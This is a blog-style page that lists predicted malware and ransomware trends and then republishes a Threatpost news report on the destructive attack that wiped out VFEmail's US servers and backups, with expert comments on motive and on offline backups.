How to Research

Advertisements

New Malware Attacks

Just when you thought you had all of your defenses in place when fighting Malware, Cyber Attacks, and Ransomware… think again! Cybercriminals are busy crafting new methods of attacks that are ready to take your data for prey and pounce on your personal information. Here are 10 new sneaky attacks to be on the look-out for in the new year!

Rivaling governments and geopolitical cyber-warfare funding the efforts of cybercriminal gangs to create chaos, steal intellectual property, and profit from fraud and extortion by breaching personal data.
New variants of ransomware (including doxware, which threatens to publish sensitive data like browsing histories unless a ransom is paid)
Much more widespread use of cryptojacking (stealing computing resources to mine cryptocurrency without sharing the profits)
More distributed denial-of-service (DDoS) attacks on critical servers and networks, abetted by the conscription of armies of Internet-of-Things (IoT) devices
Increasing use of fileless malware (which never becomes disk-resident, only loads directly into memory, and thus evades many signature-based endpoint anti-malware measures)
More synergistic attacks (in which multiple malware attacks are injected onto a system and the poorest-defended one activated using AI and ML to improve attack techniques
Continued reliance on phishing as the most effective attack vector for malware, with more sophisticated attacks targeted at higher-value individuals.
Increasingly target cloud services and edge computing environments with malware attacks
Enslave legions of IoT devices for use in DDoS and cryptojacking attacks
Exploit the new attack surfaces and rich data targets presented by 5G networks and applications.

A Threatpost Report : Attackers Completely Destroy VFEmail’s Secure Mail Infrastructure

“Every file server is lost, every backup server is lost.”

A catastrophic, smash-and-destroy cyberattack has eliminated the U.S. infrastructure for secure email service VFEmail. It’s a rare example of a purely destructive offensive, apparently unmotivated by financial gain or espionage goals.

An attacker wiped out the company’s U.S. servers on Monday evening, including backups, destroying almost two decades worth of user data in just a few hours. VFEmail owner Rick Romero noted that the attack took aim at VFEmail’s “entire infrastructure,” including mail hosts, VM [virtual machine] hosts, an SQL server cluster and the virtual machines themselves.

“At this time, the attacker has formatted all the disks on every server,” tweeted the company. “Every VM [virtual machine] is lost. Every file server is lost, every backup server is lost.”

Romero added that kind of access means that whoever did this had multiple passwords: “If they all had one password, sure, but they didn’t. That’s the scary part,” he tweeted. The company account added, “Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via SSH exploit, and there was no ransom. Just attack and destroy.”

In an update posted to the company’s website, Romero identified the hacker as “last seen aktv[at]94.155.49.9” – he caught the malefactor in the act, but wasn’t able to salvage much.

Romero said in the website update that incoming mail was now being delivered, but that getting anything historical back would be unlikely.

While attacks that do nothing more than destroy infrastructure have been launched in the past (think Shamoon, Black Energy, Destover, ExPetr/Not Petya and Olympic Destroyer), the question remains as to why someone would want to take out a niche-focused Wisconsin-based email provider. Wiper attacks and other destructive efforts are generally used to send a political message.

“This kind of destructive attack, with no stated motive or demands, is quite rare,” Chris Morales, head of security analytics at Vectra, said via email. “An organization losing all of their data, and all of their customer data, is a nightmare scenario that could easily put a small company out of business and cause a huge financial impact on a large enterprise. Sony suffered this type of catastrophic destruction in 2014, which was attributed to North Korea.”

Romero intimated that this could indeed signal the end for his privacy-focused company, which he started in 2001: “Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

Beyond the possibility of a personal vendetta being behind the incident, Justin Fier, director for Cyber Intelligence and Analysis at Darktrace, said that the incident could be attackers simply wanting to cover their tracks after successful data exfiltration.

“It’s easy to imagine the attacker may gotten what they wanted and figured the best way to clean up was to destroy all the evidence,” he said via email. “In the past, this tactic was frowned upon as it is inherently noisy, and many attackers want to be as stealthy as possible. However, we’ve clearly entered a new era of attacks.”

He added, “This attack has some of the telltale signs of nation-state activity and it’s interesting to consider why a nation state might want to do this. What information was on VFEmail’s servers that a nation-state might want to obtain, or, on the other hand, what might they not want found?”

Details are scant in terms of how the attack was carried out so effectively – the multiple password aspect could suggest an inside job. Meanwhile, some security researchers are questioning why there was not better backup in place.

“This raises questions of what disaster recovery strategy was in place and why data wasn’t backed up into cold storage, thus making it unavailable to attackers,” Fausto Oliveira, principal security architect at Acceptto, told Threatpost. “If they had a strategy in place, they should be able to recover at least a substantial part of their customers data. The fact that attackers were able to access and erase all the information demonstrates that the systems were not protected in an effective way.”

Morales meanwhile added that “the first thought that comes to mind is this is a service being sold as a secure email. The second is that if this is secure email then where are the offline backups and archives? Offline backups might not give a full restore to the exact date data was lost, but it would prevent the complete loss of all historical user data. Offline backup is the same strategy organizations are using to counter loss from ransomware.”